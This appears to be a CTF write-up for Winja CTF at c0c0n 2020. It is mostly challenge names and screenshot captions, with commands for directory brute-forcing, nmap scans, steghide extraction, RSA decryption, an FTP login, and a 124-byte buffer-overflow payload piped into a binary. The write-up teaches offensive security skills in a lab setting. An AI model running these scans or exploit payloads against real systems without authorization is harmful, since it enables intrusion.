Winja CTF — c0c0n 2020 — Writeup

Winja CTF 2020

LEVEL 1

Trader’s Gambit 1
Gobuster Directory Bruteforce
Trader’s Gambit 2
Risk Aversion
file and Strings Output
Assembling it All Together: 1
bo-temp.js file
Assembling it All Together: 2
flag.js
Lock and Key
Extracted files
Metadata of alcohol.jpg
Steghide data of real_programmers.jpg
openssl rsautl -decrypt -in encrypted -out plaintext -inkey steganopayload26919.txt
Enter pass phrase for steganopayload26919.txt:
RSA operation error
140538692908352:error:0406506C:rsa routines:rsa_ossl_private_decrypt:data greater than mod len:../crypto/rsa/rsa_ossl.c:400:
Flag in plaintext
CSWheeee!
csv file with data
Col9 sorted
FTP FTW
Nmap port scan
ftp 192.168.1.104
Connected to 192.168.1.104.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.1.104]
Name (192.168.1.104:aravindha):
331 Password required for aravindha
Reverse shell

Level 2

Liar Liar
file this_is_a_binary 
this_is_a_binary: HTML document, ASCII text
echo "dGhlc2VfYXJlX2FsbF9pbnRlZ2VycyAweDY2LCAweDZjLCAweDYxLCAweDY3LCAweDdiLCAweDM4LCAweDczLCAweDc1LCAweDMzLCAweDZlLCAweDczLCAweDY4LCAweDVmLCAweDQ4LCAweDRmLCAweDRlLCAweDQ1LCAweDUzLCAweDU0LCAweDU5LCAweDVmLCAweDY5LCAweDczLCAweDVmLCAweDc0LCAweDY4LCAweDY1LCAweDVmLCAweDQyLCAweDY1LCAweDczLCAweDc0LCAweDVmLCAweDUwLCAweDZmLCAweDZjLCAweDY5LCAweDYzLCAweDc5LCAweDdkLCAweDBhCg==" | base64 -d
these_are_all_integers 0x66, 0x6c, 0x61, 0x67, 0x7b, 0x38, 0x73, 0x75, 0x33, 0x6e, 0x73, 0x68, 0x5f, 0x48, 0x4f, 0x4e, 0x45, 0x53, 0x54, 0x59, 0x5f, 0x69, 0x73, 0x5f, 0x74, 0x68, 0x65, 0x5f, 0x42, 0x65, 0x73, 0x74, 0x5f, 0x50, 0x6f, 0x6c, 0x69, 0x63, 0x79, 0x7d, 0x0a
Zipbomb
Password Cracking using JohntheRipper
#APictureSaysItAll
Instagram post
steghide extract -sf img.jpeg            
Enter passphrase: p@ssw@rd!234%

wrote extracted data to "flag.txt".
cat flag.txt
flag{the_team_Re@lLy_loved_Y@Ur_sk!ll3}
Sourcery
Github Repository https://github.com/ayushpriya10/dont-look-here
Gitleaks output
Flag
!_a_gold_digger
nmap 159.89.163.92               
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-20 07:58 IST
Nmap scan report for 159.89.163.92
Host is up (0.035s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp filtered telnet
25/tcp filtered smtp
53/tcp filtered domain
80/tcp open http
81/tcp open hosts2-ns
82/tcp open xfer
83/tcp open mit-ml-dev
179/tcp filtered bgp
Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds
DNS record of AXFR

LEVEL 3

F@#$ YOUR MIND
JSF*ck Decompiled
Jump the Shark
Each Response in pcap
strings file.pcap | grep "\"code\":\"valid\""
Hexadecimal to ASCII
AAAAAAAAAAATTACK
Radare 2 with afl
python -c "print 'A'*124 + '\xda\x50\x04\x00'" | ./a64.out
attack.log
Linux-virus request
The MD5 hash:
52c69e3a57331081823331c4e69d3f2e
was succesfully reversed into the string:
999999
flag at 999999 key
1 ❤ php

Secarmy Developer | CNSS | Cybersecurity Enthusiastic | CTF Player | InfoSec | Red-Hat Academy Student Ambassador |
